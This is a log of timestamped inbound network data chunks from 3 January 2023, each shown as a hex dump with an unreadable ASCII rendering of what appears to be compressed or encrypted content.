2023-01-03 15:29:20 UTC	1498	IN	Data Raw: c2 1a 20 06 fc 7d 3d 13 7c 7e 94 94 02 94 5f 85 b7 13 3e 3f 78 e1 f5 c5 c2 df 9f 3b a9 00 5c db 06 08 5a 01 a8 09 9f 9f 3f e0 ed 48 80 8f a7 3d 36 c0 fb f0 f7 f0 64 f0 cf 0f 64 6f 00 f2 b9 00 04 73 02 c4 86 cf c7 c8 2d 80 c7 83 00 bf e6 03 f4 f6 06 f8 30 14 60 36 bc df 27 e0 f3 88 75 11 e0 67 f8 3a 59 ad 02 28 45 07 90 aa 0c de 2e 1d 80 98 f0 f9 d1 34 0c f0 1b 7c 3c f1 e1 eb 8a 1f 3e ff ee 3d 82 d7 0f 6f 57 10 bc 9d 77 e1 fd 0e 86 d7 ff 1a de ef 7c a7 00 1d 7b 01 8a 6c c0 fb 07 3e 7f 02 c3 e1 44 cc df fb 00 e3 e3 00 e6 56 02 2c 82 c7 45 e1 fd 90 09 b7 c7 15 3e 7f fa e0 f3 d6 d9 16 60 12 7c 5c da cf 00 36 c3 d7 f3 d4 6b 80 7a a3 00 b3 8a 00 4a c2 e7 d7 33 b8 5d c3 f0 f1 21 85 c7 ed e1 e9 bc 64 00 1e 11 03 64 31 06 e8 04 b7 8b bc 1d e0 1f 78 7f 1b c2 d7 a9 Data Ascii: }=\|~_>?x;\Z?H=6ddos-0`6'ug:Y(E.4\|<>=oWw\|{l>DV,E>`\|\6kzJ3]!dd1x
2023-01-03 15:29:20 UTC	1499	IN	Data Raw: bf 86 e6 c7 d3 64 9f 3f 93 9e 36 51 fc 59 48 f6 e2 a0 7c 7d 68 5c df a0 38 69 23 c5 17 29 1f 62 da 95 ec 3f 81 e2 8d b5 e4 47 37 53 9c 51 93 d6 8b 62 b2 cf c8 7e 98 1e 27 bf 9e 40 fd 7f 8b ec 66 27 d9 55 1c f9 d5 f3 34 4e bb c9 ef 3d f8 0a a6 f3 87 60 da 86 d6 c5 e9 14 ff 9d a0 38 6c 0f f9 d9 da 34 5e f7 3f 8b 69 8b 9f 31 dd 4a fd a8 1a 87 69 3f 1a ff 01 34 7f 6b 6b 68 6f c1 11 c8 1f d1 fa 71 8e fc fe 4f b4 7e 3e 51 19 d3 6e b4 ce 64 53 7f aa d2 38 fd ec 47 f7 4d 76 b8 8f d6 a5 67 28 7e 1e 46 eb c0 46 b2 ef 74 9a ff 73 49 ff 0f d1 f5 6b b4 5e 96 d0 7a 7e 38 1f d3 ef c8 2f be 4c fa 0d 22 bb d8 46 fe f4 30 8d d3 8f 14 4f 35 27 bf d1 92 e2 f3 76 b4 6e b5 df 8b a9 46 f1 f8 c3 15 31 8d a1 7d c4 51 ba 5e 42 e3 1c 4d f1 c4 f3 25 d4 0f 8a 7b 97 51 bd 76 8a 5f 7e Data Ascii: d?6QYH\|}h\8i#)b?G7SQb~'@f'U4N=`8l4^?i1Ji?4kkhoqO~>QndS8GMvg(~FFtsIk^z~8/L"F0O5'vnF1}Q^BM%{Qv_~
2023-01-03 15:29:20 UTC	1515	IN	Data Raw: fa 9b f5 de 39 1e cd 0d 97 2c e3 3a 99 ce 63 ca da df fa bc e4 68 25 ab bc bc 9d 9a 31 56 b9 fb f9 9a 7b 7d e5 d7 91 15 b2 77 95 fa a1 c1 85 96 b7 2a ef ca 57 2e af 5f 13 e5 25 6d cd 2c dd b3 be dd e3 47 77 be b5 9d bb ce fd fa 05 4a b7 60 05 76 c5 5b f3 6f ae 8c 72 5b 15 94 b7 15 a9 0a 63 ab 48 77 25 2f 6f ff b3 ce d6 f4 d6 f7 79 fb fb bd b5 fc 9f 9e 27 5e 94 7a 53 ea 73 97 fd ba f5 75 f9 9e fb f9 4f df df dd d6 77 bb eb ea 7f b9 9c fb 75 97 7d a6 f8 4b b7 64 77 3b 77 e6 23 fb 2e af e7 58 d3 5b 95 57 60 4d a5 5b 5f af 59 01 ed 78 7f 85 bb 93 ff bd f1 bd 9d be 24 67 dc f5 4c 34 a6 b7 2e 7f fb 79 7e 77 7a 76 97 df 3e ff 9d fc 0d 54 30 f7 43 26 56 dc e2 af 3b df bf d5 7f ba fb 5d f7 7e ff 53 76 79 7b bd 96 f3 b5 db 9c 27 fd 3d fe a7 eb f9 bb ed dc 49 2f 7f Data Ascii: 9,:ch%1V{}w*W._%m,GwJ`v[or[cHw%/oy'^zSsuOwu}Kdw;w#.X[W`M[_Yx$gL4.y~wzv>T0C&V;]~Svy{'=I/
2023-01-03 15:29:20 UTC	1516	IN	Data Raw: f7 e3 3f 9c de b3 c5 78 58 a1 78 f8 76 d7 55 8a 3f 35 67 fc 19 4f cf 25 cb e3 d0 2b f4 1c e6 b2 87 95 57 d0 df 3f 46 55 be 9b eb ee 72 09 56 c5 58 f3 d7 ab 6c bd be b5 0e 5e 5f 41 f1 74 89 60 ed 4f f9 ac e5 55 08 ae 2c dd 52 2f ee bc c2 db fa 5e b2 95 25 78 a5 b6 f5 fa 0a ef 5b bf cf ed fe 1e fc 60 c7 dd e5 2b 3f cf 18 ec b8 55 7b 77 ba ae de b2 5d d9 f9 f7 52 12 fd 7d aa 0c a5 1d ad fb 55 cc a7 39 f3 b9 eb 65 69 b4 f5 7d 2b b4 0f e5 4f fb 93 15 de d6 f7 d2 cb b9 fc 39 91 f5 3d 50 97 fc 5e ee 87 cb ab c4 5a cf af 6e f7 3e b1 bb 9f 29 6f 7f 4b 55 33 bb bf 57 ca 3c 6f 5b ab 7e 50 ae 41 e3 b6 d2 3f b0 7f 77 97 df 6d 7e f7 7c ff dc b9 e5 3d f5 eb ae fd d8 ed ea fb a7 ae bb 98 8f b7 0a 15 d8 08 55 00 3f 88 00 07 f3 f1 0e 18 02 f7 31 df 5d 09 5e 62 9f 79 50 99 Data Ascii: ?xXxvU?5gO%+W?FUrVXl^_At`OU,R/^%x[`+?U{w]R}U9ei}+O9=P^Zn>)oKU3W<o[~PA?wm~\|=U?1]^byP
2023-01-03 15:29:20 UTC	1532	IN	Data Raw: 13 ef 55 4c 69 2f 4c 88 f2 f9 04 a8 eb 39 0e fe d3 5c 36 9f 0b b0 2c c7 27 ca e5 06 02 ec 5e 3b 74 9c 56 83 ba 41 1c c6 9a 72 1c f6 52 42 cf b5 22 a2 a2 4a 3b 9f 45 52 53 31 1f 59 92 6e 58 c4 44 15 7c 54 1f ba b2 95 3b 4e ab 09 35 db 72 8a c2 71 5a 69 7a 50 45 5c cb d5 a1 58 f6 d2 3c b1 eb b4 ae e6 81 6b 13 15 f3 75 0e 85 1d 27 8e eb b4 b2 02 d0 c9 64 2e 51 16 57 da a5 95 fa be be 97 cf d7 54 14 05 da 36 ca 79 6e eb f9 6a 26 4b 27 a3 b2 80 c7 0b 5c 59 a6 90 77 88 81 97 96 94 cf 5b 36 c7 95 99 4e 21 d7 88 fc cc cb 2c 4f 17 1b d6 38 b8 6e e4 d8 44 49 ae f6 40 0f 2a 42 a2 ec c0 ae 68 b0 76 44 54 ce 9b 2f 68 58 6e 4c 54 c6 07 c6 73 2f 4b e2 32 14 d7 52 3c df 93 3a 19 5c b9 b5 55 7f e8 39 ad 86 ee 03 bf 28 34 15 05 56 c5 f2 0d 2c 9f ee c5 27 5b f1 f2 a5 a6 64 Data Ascii: ULi/L9\6,'^;tVArRB"J;ERS1YnXD\|T;N5rqZizPE\X<ku'd.QWT6ynj&K'\Yw[6N!,O8nDI@*BhvDT/hXnLTs/K2R<:\U9(4V,'[d
2023-01-03 15:29:20 UTC	1533	IN	Data Raw: a2 8b 88 72 79 7b 98 87 aa db a3 c4 33 9b 08 da 57 9a 68 2a e4 b3 30 32 8c bc 82 a8 8c 2b 15 61 94 a7 96 e5 52 e2 2b d6 a8 5a 9c ee 92 d5 c6 6d a2 3c 4a 4a 2a 65 b9 81 fb a0 27 74 69 26 8b 37 7a 51 1c 7b 44 a5 7c 7c 23 72 6d 2f d6 14 1f 24 44 d6 c6 09 51 19 9f 6a 09 f3 d8 4e 89 8a f8 20 bc ef d8 be a6 a0 00 ef 49 05 ae 17 66 44 79 fc 5e 7e 16 27 9a 2a 5c 3e 06 1b 64 56 ae 93 c1 57 48 06 96 eb 6a aa 32 64 1a a9 71 3b 1d 2a e4 29 8c dd c8 b7 15 65 55 32 0a 6a 43 48 54 c0 ad 6c 74 5e 71 4c 54 c2 17 33 84 41 60 25 44 d9 7c 59 42 2c 93 34 d3 f7 e2 b6 83 9f 27 69 4e 54 ce 17 18 84 79 94 69 2a e4 5f 13 44 45 50 d8 0e 45 c8 67 7c f2 20 b1 7c a2 22 be c4 28 f5 95 05 43 cf c5 3f 85 28 ec 3c d6 94 cd 35 73 0f 3d 5b 40 54 58 59 70 85 fe 5a 3a 6e ab 99 7d 5f 19 0f 8e Data Ascii: ry{3Wh02+aR+Zm<JJe'ti&7zQ{D\|\|#rm/$DQjN IfDy^~'\>dVWHj2dq;)eU2jCHTlt^qLT3A`%D\|YB,4'iNTyi*_DEPEg\| \|"(C?(<5s=[@TXYpZ:n}_
2023-01-03 15:29:20 UTC	1549	IN	Data Raw: 09 c6 6f 3c a1 9b 0c 62 0e e8 24 5e 46 77 dd e8 10 04 0e 1f 33 86 c5 64 1d 09 47 ce 09 f7 37 95 bc 37 ed 20 08 af 73 2c 25 95 0c a8 a6 91 34 01 15 a9 ea 9d 67 42 ab 37 72 15 80 8b e0 6d e5 53 96 b0 7a 47 09 1e 72 31 22 ee 6c 2b 85 08 82 7b b9 c0 14 d4 75 3c 95 06 e6 80 10 8e 18 d7 51 85 08 a0 31 41 00 e8 3c b3 61 41 20 96 9a 1c 60 0c b6 4a 85 4b bc 50 21 52 f9 69 28 29 d7 ba 4d 62 f3 4a 07 a1 e2 84 52 05 10 7b 0d 29 53 44 f9 32 f5 fc 66 df 7d 6d 15 ec 6a 54 8d 24 f6 73 6b 4a 1a 4d 18 ea 6c 05 af 0b 18 f3 88 d7 f0 c4 88 15 a7 8c f7 d6 33 b2 8b 00 29 81 60 71 f1 c2 0d de bb 95 ee 19 a3 dd 29 16 ec 1d 9a cb 45 ff 55 a3 3d b0 11 a2 fc 68 fa 67 b0 03 7c 73 88 94 6b dd 34 0b 54 76 10 a9 4a 84 a6 5c b9 26 37 0d e2 9c 10 1b 01 5e f0 7e f0 6d 42 d3 9d 82 ed ec 28 Data Ascii: o<b$^Fw3dG77 s,%4gB7rmSzGr1"l+{u<Q1A<aA `JKP!Ri()MbJR{)SD2f}mjT$skJMl3)`q)EU=hg\|sk4TvJ\&7^~mB(
2023-01-03 15:29:20 UTC	1550	IN	Data Raw: 62 30 c1 f5 7a 58 aa 29 5e b6 0a ed 2a 44 40 ef dd 43 ca 26 f9 93 59 aa 0d ec dc ca 7c 30 cd 32 9d 59 b6 64 f4 4a 81 22 ec 76 e2 89 46 fc ce 86 9e f4 5f bd 62 4d 8e 9e 93 6c 7f 6b 7d e8 91 18 ce 11 7f b3 ab df 20 e9 a5 d2 63 bb 8a 7a 15 2b 1e a0 d9 01 13 ab 29 7d 9e df fe 70 d3 56 ae b6 b9 14 fa 89 00 bd 40 5f 91 6d a5 67 12 c6 38 1e 9a 09 92 c3 79 b2 34 22 8c ef 42 a4 21 e6 a0 f1 8a 5a e4 77 df cc 7a b4 0d d4 dc 8d 50 b6 1a 91 d5 09 81 98 9d c0 58 f9 d7 4d 23 18 0e 49 5a 4e 6d 09 80 ba 28 43 b0 0d 81 21 f4 20 a1 7e 87 4a 26 e2 35 e9 94 08 55 ec e7 5c de db 10 62 c9 c2 3a 14 3b 1f 73 c4 ef 74 3e 73 bc 72 60 d1 be 35 bb 3b c7 a3 61 f9 41 d8 6c 8c ad 61 b3 e1 08 b9 95 da 31 4b b8 0f 2b f4 1f c0 ef c0 e0 26 ac 58 e7 00 78 b1 b1 6b 12 8b 20 25 d0 0d 05 c7 6e Data Ascii: b0zX)^*D@C&Y\|02YdJ"vF_bMlk} cz+)}pV@_mg8y4"B!ZwzPXM#IZNm(C! ~J&5U\b:;st>sr`5;aAla1K+&Xxk %n
2023-01-03 15:29:20 UTC	1566	IN	Data Raw: 2c a4 e5 69 6b dc d7 0a 96 31 ff 54 12 c3 8c 8f c8 e9 be 9e 92 6c e1 55 61 36 36 9a f9 17 c2 5a 5b 5a d9 86 35 ca 5a 65 8f 4f 3d 90 d8 49 61 79 f1 7f d2 2e f5 f8 8c f3 64 ef c5 04 96 95 e7 5f 93 47 f3 4a 4c f1 94 b7 92 76 4d 05 97 22 a5 b4 cc aa a4 9c 81 19 85 3d 8f 64 a7 8f 54 0f 6b 77 85 c7 de 51 cf 18 1f 7a 8a f2 98 54 a4 6a c1 82 d5 6f 64 a0 9a 55 e4 5e 09 c5 2f 69 6f a6 c4 f4 1b c3 e1 1a 23 4c 5b f2 ef f7 0b 05 46 fc d6 4c 9e 75 ab 95 4a 66 39 da 75 67 9b 9d 3d 17 8e 55 0c 5f 60 96 94 3b 79 be 85 73 a4 0d 4f a5 93 30 65 9f ad ea 06 97 ba c0 9f 28 44 ba d7 ae 97 9e ad f0 4d f2 50 c2 1f 1b da 84 2f 6a 69 69 22 a5 c1 99 e8 5f f3 2b e5 e4 cd dc e5 a2 d1 9e 73 da d3 98 d5 b5 95 e7 9f f0 43 9d 17 05 6e 60 54 59 d5 c0 6b 24 16 b0 5c 4b 0c e0 cc c6 11 5e bd Data Ascii: ,ik1TlUa66Z[Z5ZeO=Iay.d_GJLvM"=dTkwQzTjodU^/io#L[FLuJf9ug=U_`;ysO0e(DMP/jii"_+sCn`TYk$\K^
2023-01-03 15:29:20 UTC	1567	IN	Data Raw: 28 0d 0e bc a7 e4 55 e8 c8 47 dc 66 fa a3 46 58 f8 f9 ba 50 c0 04 5a a1 89 e4 49 9b a0 8b 0e c1 47 08 e2 0a 05 b2 6a ec 36 c4 be 88 c8 69 14 33 a5 bb 76 0c 3a bb 3a 1f 19 87 32 62 7e f5 da 9e 74 49 22 f8 d3 f4 15 d1 e9 b9 ad 90 e4 6a 33 93 d5 ca 2b 3d eb 26 3d 09 91 df 43 5c 0a 4e 2d 04 a5 2e c8 52 00 3b 00 e3 ba d6 4c 64 6c 37 24 23 81 73 a3 9c bd ad 91 8a c5 d4 b2 44 02 38 a5 8e 2e 5a 17 29 85 68 21 55 e2 fb 7d 28 8e b4 88 fe 81 4b 16 d6 5b 78 5a 5f c1 50 1f 10 32 43 11 24 ce e1 44 61 cb 18 37 b5 00 cb 15 56 3d e2 0a 97 a1 dd df d2 ad 43 ed a4 0d 2b 4e a6 6e ba 09 86 4e c6 c2 ff 5d 34 07 b5 d9 57 31 53 a1 e8 fc 24 9d a3 c4 d7 82 1d 48 2f a8 21 4a 42 a1 bc e6 75 16 a8 27 91 91 a5 eb a3 01 95 6e 46 82 be d1 74 32 b5 11 94 e4 a1 51 d4 84 f6 4e 8e 88 c2 52 Data Ascii: (UGfFXPZIGj6i3v::2b~tI"j3+=&=C\N-.R;Ldl7$#sD8.Z)h!U}(K[xZ_P2C$Da7V=C+NnN]4W1S$H/!JBu'nFt2QNR
2023-01-03 15:29:20 UTC	1583	IN	Data Raw: 59 73 94 24 f5 5a c2 82 85 52 30 00 0d ea ce 11 1e 89 66 54 a2 7f 06 b6 9d 54 32 44 44 3b 91 87 5b 6c 6b 97 75 7c cc 68 c5 15 a2 5c 49 ad 1e 06 7f 0b c1 2e 5b d2 0b b2 59 82 e8 94 50 da 42 b9 2d 5d ba f7 40 6f b2 d4 0d 96 43 9a b9 cc 80 77 99 75 a6 49 ce 7f 1a be 15 44 9d 8e 1a e6 2b 4a b1 47 4a e7 83 9e 21 19 10 a9 3b 92 e6 6a 40 b3 05 10 9a a0 0b ed 72 fb d5 02 6f 5c 41 a7 ca 79 e6 84 6a 94 1a b6 19 ee d1 0a 94 0e 2c f2 1a 90 25 a9 49 13 57 69 d9 f6 6c 60 15 49 d3 54 07 01 9c 3e 1b 34 d2 99 48 17 fa 24 28 dd 43 a6 29 47 f2 6f 85 46 dd 90 60 89 94 e2 16 cf 31 60 90 0d 76 ab c7 bb 09 6a ca 94 25 5b df 96 19 f8 0b 12 4a 87 56 6c 09 7d 57 4e c9 19 81 10 04 2b 45 b0 3e e2 c9 c5 7c ac f2 e6 0f 0a 4d 81 8c bc 69 a9 66 bb 44 12 45 35 8a d2 f9 0e 4f 36 60 c1 36 Data Ascii: Ys$ZR0fTT2DD;[lku\|h\I.[YPB-]@oCwuID+JGJ!;j@ro\Ayj,%IWil`IT>4H$(C)GoF`1`vj%[JVl}WN+E>\|MifDE5O6`6
2023-01-03 15:29:20 UTC	1584	IN	Data Raw: 6c 5f aa bc 4e 14 cf 1d 22 99 41 02 19 fc ba 7a 87 c0 38 2a 50 0f bd 79 c9 4a ef 9c b2 51 50 38 d2 a2 6b 7a 5a 9f 28 95 39 d0 bc 6e 0f 61 4c ad 3a 54 2c 51 66 ef 6b c4 aa 86 3f 2b 5b 32 a0 f7 23 29 29 3c ab 82 2e a5 ed 67 85 6d 37 a4 52 95 e6 e8 c0 74 e5 91 d6 fc de e7 86 64 3d 3e 43 85 ee 91 64 ca de f5 94 d0 17 34 8b 1a c0 30 15 cd 2a 86 a8 18 b1 40 81 d2 b5 88 b4 e5 05 76 c4 9a a2 7e 06 02 3e df 31 08 41 4d 4e 6c 2a bd 34 a7 85 83 7c d4 22 b7 7b d2 87 35 d4 9d 81 04 e5 9e 06 06 05 c4 b1 2d 4d 4f 03 cf 6b 32 fd b2 cc 65 13 0d de fc a1 97 26 99 0a df 2e ec 42 c5 18 8c c8 62 6c 69 5f 23 87 ba 4a 0b ba be 65 8b b2 11 54 53 eb 7d a2 41 81 74 9d 5a 10 b6 6c 5b a8 16 ba 1d 2b 7d cc e5 6d 05 2b 40 a3 56 a1 29 47 64 66 59 ff 0d 28 89 28 e2 61 7d 3b b4 a7 fc a7 Data Ascii: l_N"Az8PyJQP8kzZ(9naL:T,Qfk?+[2#))<.gm7Rtd=>Cd40@v~>1AMNl*4\|"{5-MOk2e&.Bbli_#JeTS}AtZl[+}m+@V)GdfY((a};
2023-01-03 15:29:20 UTC	1600	IN	Data Raw: 71 cd 3f bc 7f e3 4f dc c9 0f dd 6f 8f f7 df bf fd 7b 0b ad 1f ed fe af 4f d5 4a e8 2e 3e da c1 b0 3f 77 7f 7d ac dc ef dd 67 7b ef 2f ac f0 f5 ea 5f 59 93 2f f6 ef 9f ed be ae cf fa 77 3b 16 f5 47 5e f5 e9 4f 57 f2 e7 27 f1 e7 27 76 5d e3 5f ec 13 3f db b7 7c 61 35 3f 1b 18 d0 ca 7c 7a 7c c3 bf f0 5c 36 7b a7 9e 81 af f9 27 83 0e d7 4f dd f5 b8 82 47 88 4e b3 cd 2b 21 55 4a 8e e7 b9 9c 05 96 36 93 e7 65 66 ef 2e 20 cd 05 9e 3c c3 b8 cc 04 cc 11 17 2b 9e 78 a2 92 3b c1 86 f5 04 12 65 a8 3d 40 a3 87 79 50 a8 f3 6b 98 70 61 09 86 50 55 19 d7 e4 88 d7 bb fb f2 12 b9 52 b1 4c 42 38 79 a7 06 56 0d e3 bb 9b 93 9a 73 b3 9f dd 75 06 f5 2f 35 63 dd ef 73 44 46 02 e6 04 2f f2 e2 44 ca 01 94 29 de 48 78 7b 0c fe 44 55 da 2b ef 38 42 ff 56 ba 85 be 13 d7 7d cd d1 fb Data Ascii: q?Oo{OJ.>?w}g{/_Y/w;G^OW''v]_?\|a5?\|z\|\6{'OGN+!UJ6ef. <+x;e=@yPkpaPURLB8yVsu/5csDF/D)Hx{DU+8BV}
2023-01-03 15:29:20 UTC	1601	IN	Data Raw: 42 f1 65 b7 8d 9f 9a e3 90 d0 f0 b8 52 73 12 73 34 47 62 43 d5 26 76 f8 c3 89 16 a3 6c 2f 71 ad 83 9f 7f 45 47 9b 58 31 eb 4d e6 6b 13 d5 36 d5 13 7d 5b 40 8a bf 49 5b e4 68 2e 36 7d 87 fa 31 76 50 da ee fe d1 95 f8 f9 0c cd dd 85 70 f4 de 14 1d 00 66 82 77 50 81 ce b4 a6 ac 29 85 6e f0 ea f2 9f 1f 66 1c 27 a6 b1 68 5e 50 a5 2e f9 09 e4 5a 98 25 b4 a2 8f 9e 9d 97 aa 20 1c 30 96 19 ea c4 1a d0 1a e7 7c 4e a0 9b 95 ba 65 dc 52 2c 65 ff 1b 9d 7e 82 4a 51 25 dd 73 9a cc 98 2b 76 7d e0 95 4d ad d9 12 54 9d 11 03 fa 1b 1d 59 f2 01 f9 cf 3d 62 09 3f d0 48 ab 45 80 65 48 94 35 fa cf d4 83 a4 7e ef ce ef ee a4 bf c7 88 05 db 4d 75 77 b0 1e 22 7d ea 58 8b 89 90 8d fd 8d 90 fb f0 b7 6f 90 8a 10 8c 2a b7 3b cf a5 6a 86 e6 b0 08 09 7e e9 88 b5 02 d8 ac af ce ba 23 be Data Ascii: BeRss4GbC&vl/qEGX1Mk6}[@I[h.6}1vPpfwP)nf'h^P.Z% 0\|NeR,e~JQ%s+v}MTY=b?HEeH5~Muw"}Xo*;j~#
2023-01-03 15:29:20 UTC	1617	IN	Data Raw: 26 ac bb 81 04 05 0c 2a 11 f3 0b ce 6b a5 5d 57 b1 a7 f3 9e 6d 6b 0a be 22 9b 3e 4d 9d 33 07 1a bf 97 e2 d9 6e 29 b4 d2 44 46 a8 c5 0f 0c bd 82 c6 56 f4 17 df 95 a2 1f 76 1e e4 b8 16 79 fb 52 54 e2 1e b8 51 03 b9 c4 0b 9c f7 15 1e d2 a9 66 89 5e ce 73 f8 1c ba 40 05 27 16 fc fa 7d 0f 49 01 c3 85 7f 5b 83 eb 5c af 67 af 89 4f ab 20 f3 7e 4a ca b1 e4 09 c8 1d 0e 9d 16 5d 82 e3 b7 d1 0b 64 a2 c8 fe 9c 1e 71 6a 0f a1 d6 2a 81 48 fa e9 f6 a8 29 27 dc 9f a4 a8 dc ef 95 6f be a4 79 9c 7e fb 09 ee 32 a9 86 62 02 5b 6f d1 7e d7 6f 9d fc db fb fb 47 54 8c 45 25 53 5c 6a 7f ed a3 18 20 c0 79 9a 66 07 67 cc d4 13 3f 57 a6 a9 d3 be fe 08 23 0b 4c d0 6a 66 3b e6 11 09 85 50 6b 9e 89 05 f9 35 af 3f f6 ce f9 ce e4 a3 54 05 c8 f4 9a ae dc ba d6 27 50 fc 3e ce 2f 1e d4 ac Data Ascii: &k]Wmk">M3n)DFVvyRTQf^s@'}I[\gO ~J]dqjH)'oy~2b[o~oGTE%S\j yfg?W#Ljf;Pk5?T'P>/
2023-01-03 15:29:20 UTC	1618	IN	Data Raw: 80 38 e1 a2 78 d8 cf 7c 3c 13 a3 fe 60 d1 85 a5 a3 a6 66 ee d9 dd 52 01 d7 14 cd bb 07 1f c1 9e ac 29 b9 a6 aa df 50 0c ac c8 ab f7 4e f7 b4 c4 cf 69 aa ea a7 98 a9 ea 59 6d 71 5c 55 d9 ca 1c 34 81 91 4f e4 b9 ae d5 5e 9b fd fe 39 55 01 b3 41 af 4d 03 7b e7 81 4c d6 e9 86 d5 fb f0 5c 3e e4 45 0e 4e 26 55 40 7f be 7a 74 f0 50 21 c9 7b df 27 cb 72 b5 52 54 b9 7f 4e c7 df 6a 68 09 42 b2 8e ea a7 77 b6 eb ef 26 e2 4d 31 6d 26 ab 75 d9 3e d3 04 a2 4b b3 d9 9d fd 13 9d af ee f2 ad 6b 1d 7e 5b 40 71 3b 52 da 77 6f a7 f7 ce 4e 0c b1 d4 02 43 ae df 6f b9 1f 6c 91 57 25 98 6f 0f d7 92 62 74 85 8b 75 67 c5 88 a9 41 7a b3 e5 d7 64 a8 b2 f6 6f c5 4f f0 0f 29 ad e7 04 5f 9e 18 ed 9d 4f b5 55 0e 57 6a ce 3e 91 2b 1f 53 be 27 74 c5 09 17 6b 87 8f 3b 81 1b 85 6c 28 51 07 Data Ascii: 8x\|<`fR)PNiYmq\U4O^9UAM{L\>EN&U@ztP!{'rRTNjhBw&M1m&u>Kk~[@q;RwoNColW%obtugAzdoO)_OUWj>+S'tk;l(Q
2023-01-03 15:29:20 UTC	1634	IN	Data Raw: 68 4c f9 eb d0 7e ec c4 5c f8 87 ac 75 60 3e ea c4 f1 d2 01 30 3b f8 6a 0a 86 5c cd 45 e5 58 b7 36 2f be fa 62 9c fc 55 f3 e6 67 df 1e 60 27 68 7e d2 f6 a5 88 98 13 f3 bb 05 f2 df 22 1f 5f 64 a5 0c 39 92 fa 7a cb 9f 04 8b 27 ab c2 21 63 b6 a1 c7 0f 30 37 34 57 d0 26 58 04 cc 3f f3 66 a5 5c d9 2d 16 f6 b2 c8 fa 83 eb 5a 9b 07 33 52 a8 26 4f 96 9c 64 f3 2f 38 e0 12 3c 1a 7b bb 4a 94 22 6f 82 df 96 ab b3 29 ad fd f3 09 20 c9 9c 83 7f 49 fe 91 e6 f4 aa 01 30 ae 7c 0d 16 90 bd d6 83 ba 00 5e 29 d3 52 e6 db 14 89 ee 6f ed ea b4 3b 3d 6d 5e 93 a5 e4 fc 8b aa 5d 83 ca 76 09 f6 1b 92 08 de a0 86 ef 91 95 6c 39 ce ee e6 2d 3b e6 bf fd d4 b7 69 50 89 90 f9 e9 c7 fc d6 96 7c d7 86 86 a9 f9 67 87 88 6f 5f 17 e5 90 9d 98 87 34 67 37 74 cc d7 b9 83 52 d9 bc 65 4a 85 b8 Data Ascii: hL~\u`>0;j\EX6/bUg`'h~"_d9z'!c074W&X?f\-Z3R&Od/8<{J"o) I0\|^)Ro;=m^]vl9-;iP\|go_4g7tReJ
2023-01-03 15:29:20 UTC	1635	IN	Data Raw: e5 50 dc f1 55 da c0 5f 3d 6e 6c c0 fc 2c 45 99 6d 0f da b5 b9 86 b6 f9 d9 c2 fc d9 9c 14 cd 62 2b 4b 5f 89 2a c0 16 17 29 18 af 29 c7 a7 dd 65 11 e2 bc 45 2d a7 b0 11 96 6f 28 12 51 2d fe dc 07 64 48 10 dc ec 91 29 e8 ce 8d d0 10 24 9d 14 9b a0 25 ef 1a e1 dd 2f 7c de 96 d3 21 0c 3a d3 04 2d 7f 70 74 97 cd e7 9d cc 2b 76 7a b8 b7 cc 77 1b 41 6e 5b 30 cc 9e 23 7d ae 7b 81 0c e3 2f 6a 3d 27 ed 22 51 4f f6 f6 d7 61 cf 77 03 3c 3a 73 54 44 00 62 76 7c f8 8b 8b bf 51 6b 5a 98 ca c6 c6 33 47 ab 2d 61 77 c0 a7 61 f3 5f 41 b6 6e 9f 5b dd f0 f5 49 ac fa e6 77 0a 54 a3 4b a0 e8 2b 69 d7 cd e7 00 f6 5b e4 b1 ed cb 00 83 d9 c8 7b a6 54 1a f1 08 db e0 35 65 68 c2 81 6f ca ba db fb 2e c0 03 96 9f 9d f3 58 9a 40 49 53 80 84 35 10 56 18 e0 e0 4e 81 d6 25 c5 94 af 39 31 Data Ascii: PU_=nl,Emb+K_*))eE-o(Q-dH)$%/\|!:-pt+vzwAn[0#}{/j='"QOaw<:sTDbv\|QkZ3G-awa_An[IwTK+i[{T5eho.X@IS5VN%91
2023-01-03 15:29:20 UTC	1651	IN	Data Raw: a5 93 7f 85 21 d0 80 2a ab 0b 02 14 25 89 8b 30 44 4c 9a ce 13 08 ca ec 70 82 13 6a 97 1c 0e 0e 01 cc 76 03 54 90 1b cc 98 66 78 f9 89 c8 33 84 90 af 44 7e d4 63 e0 cc bf 52 f9 ad b9 33 47 34 28 0e d2 bb 33 9a db 0b 98 d0 13 68 f7 46 82 6b e7 c7 d5 e9 a8 8b 21 32 49 90 73 dd 61 38 57 70 c3 01 9e 8c 58 bf ec 21 0b a7 48 97 d6 1c ed 57 44 74 f2 64 2f a4 3a 62 ab f2 22 cd f6 c3 f1 2e b9 7b 73 66 2f 5b c4 40 1a df 0a a4 4b cb 7f ba f2 13 1f cf 0d b1 a7 cb f3 aa 40 98 4e d0 e2 cf 11 ee b9 88 4a ce da 9f b5 a1 f3 c5 cf e1 fa a6 89 ba cd ee 49 a3 d7 9c c3 6f 65 20 68 9e 48 1e 97 ec 96 01 36 5c 77 c4 eb 2e 69 cb 04 59 ca 1b ef 8e 18 71 f2 85 d1 e7 92 03 fa 08 ed 19 44 eb 13 22 ae 84 c8 6f 83 e8 3a 6f 68 35 22 14 21 1f 2a c0 08 83 19 ba a8 30 72 e0 88 47 e0 fa 25 Data Ascii: !%0DLpjvTfx3D~cR3G4(3hFk!2Isa8WpX!HWDtd/:b".{sf/[@K@NJIoe hH6\w.iYqD"o:oh5"!0rG%
2023-01-03 15:29:20 UTC	1652	IN	Data Raw: 72 08 bd 41 fa 57 40 31 0f 54 a9 6b b2 ad 0e d8 7b 98 9c f0 f9 0f 73 63 79 b6 35 72 dc 0d ca a7 02 9a 40 5b 5b 1c 39 70 6f 54 93 07 ac 18 ef 1c 60 05 ea dd 38 4d 83 55 0c fe 4f 54 25 2d ee 74 0f 6e a8 aa 1d 40 0d 76 d4 8d ea e9 46 a6 fb 41 6e d6 a3 be e9 13 e6 df 30 3b 77 de f5 c1 1a 4b 62 d2 3e 41 21 5b f5 85 fe c5 dc 78 4f 66 2a 5e 3e 29 45 f7 97 0c 75 a9 92 af 8d b1 dc 6b 02 e1 c5 d1 e5 36 b0 2f e8 61 80 30 a4 f2 1b 00 6f 07 99 01 94 45 4c ea 01 ca 67 6d 9c dc e0 58 31 23 96 46 74 a8 f5 1b 21 53 9e 44 e6 c9 93 ef c2 01 a5 19 55 b7 63 2e 44 15 a5 f9 9e 78 f9 cf e7 c6 59 3a a8 13 b4 35 26 d8 3f 21 38 e5 08 18 81 18 b0 da 1c f7 80 1e 6d 0f c8 5d 87 4f ac 93 b2 4d 81 a1 27 da 0f 3d 46 73 56 24 aa d4 a9 90 16 ec 89 2a bd 26 2f d8 90 2b 51 f1 83 a2 2c 48 5e Data Ascii: 